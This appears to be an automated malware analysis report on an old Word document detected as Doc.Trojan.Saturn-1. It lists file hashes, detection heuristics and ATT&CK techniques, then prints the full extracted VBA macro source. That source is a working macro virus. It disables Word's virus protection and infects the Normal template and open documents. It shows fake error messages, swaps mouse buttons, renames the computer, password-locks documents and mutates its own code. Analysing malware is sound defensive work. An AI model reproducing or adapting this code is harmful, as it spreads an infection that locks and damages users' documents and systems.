Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 da6d191bdbd300a9…

MALICIOUS

Office (OLE)

32.5 KB Created: 1998-10-25 15:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 84e41109fdcf7b28c2411149ea7ac1f9 SHA-1: 2518088f65ed9c8c077915c735f4892c5b8cb746 SHA-256: da6d191bdbd300a950385da94e6d18683ca802ba9c0e3d68b6d7ea340e8aee29
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing malicious VBA macros, specifically triggering AutoOpen and AutoClose events. The macros attempt to copy themselves to the Normal template and the active document, indicating an intent to establish persistence or spread. The ClamAV detection as 'Doc.Trojan.Saturn-1' further supports its malicious nature. The specific IOCs are related to the file paths used by the macro for copying itself.

Heuristics 5

  • ClamAV: Doc.Trojan.Saturn-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Saturn-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3194 bytes
SHA-256: b73c5da54cb592679ea5fbca37c7c4d0acbdad113717e1a6538068b11881e967
Detection
ClamAV: Doc.Trojan.Saturn-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Saturn"
Private Declare Function SetComputerName Lib "kernel32" Alias "SetComputerNameA" (ByVal lpComputerName As String) As Long

Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long

Sub AutoOpen()

On Error Resume Next

Application.ScreenUpdating = False

Application.DisplayAlerts = wdAlertsNone

Options.VirusProtection = False

DocInfect = False

GlobInfect = False

For b = 1 To ActiveDocument.VBProject.VBComponents.Count

If ActiveDocument.VBProject.VBComponents(b).Name = "Saturn" Then

DocInfect = True

End If

Next

For U = 1 To NormalTemplate.VBProject.VBComponents.Count

If NormalTemplate.VBProject.VBComponents(U).Name = "Saturn" Then

GlobInfect = True

End If

Next

If DocInfect = False Then

Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Saturn", Object:=wdOrganizerObjectProjectItems

ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate

End If

If GlobInfect = False Then

Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Saturn", Object:=wdOrganizerObjectProjectItems

Options.SaveNormalPrompt = False

End If

Saturn

Application.DisplayAlerts = wdAlertsAll

End Sub

Sub AutoClose()

On Error Resume Next

Call UMP

Saturn

Call UMP

ActiveDocument.Save

End Sub

Sub Stealth()

On Error Resume Next

Call UMP

RM = Int(Rnd * 5) + 1

If RM = 1 Then smeg$ = "Not enough memory to perform this operation"

If RM = 2 Then smeg$ = "Impossible open this function"

If RM = 3 Then smeg$ = "Function does not answer system requests"

If RM = 4 Then smeg$ = "This program has performed an illegal operation and will be locked"

If RM = 5 Then smeg$ = "This option at present not available"

steMsgType = vbCritical + vbOKCancel + vbMsgBoxHelpButton

message = MsgBox(smeg$, steMsgType, "Microsoft Word")

If vbOKCancel Then

SMB = SwapMouseButton(&H4)

Documents.Close

End If

End Sub

Sub ToolsMacro()

Stealth

End Sub

Sub ToolsCustomize()

Stealth

End Sub

Sub ViewVBCode()

Stealth

End Sub

Sub Saturn()

On Error Resume Next

'Saturn by ULTRAS [SOS]

If Day(Now()) = Int(Rnd() * 30 + 1) Then

Computer = SetComputerName("SOS")

ActiveDocument.Password = "SOS" & Int(Rnd * 333) + 1

ActiveDocument.Save

End If

End Sub

Sub UMP()

'ULTRAS MACRO POLYMORPHIC

PoNu = Int(Rnd() * 28 + 1)

For Mutate = 1 To PoNu

PoRL = Application.VBE.ActiveVBProject.VBComponents("Saturn").CodeModule.CountOfLines

PoLi = Int(Rnd() * PoRL + 1)

a = Rnd * 455: b = Rnd * 80: c = Rnd * 160: d = Rnd * 180: e = Rnd * 49

Application.VBE.ActiveVBProject.VBComponents("Saturn").CodeModule.InsertLines PoLi, vbTab & "' " & a & vbTab & b & vbTab & c & vbTab & d & vbTab & e

Next Mutate

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.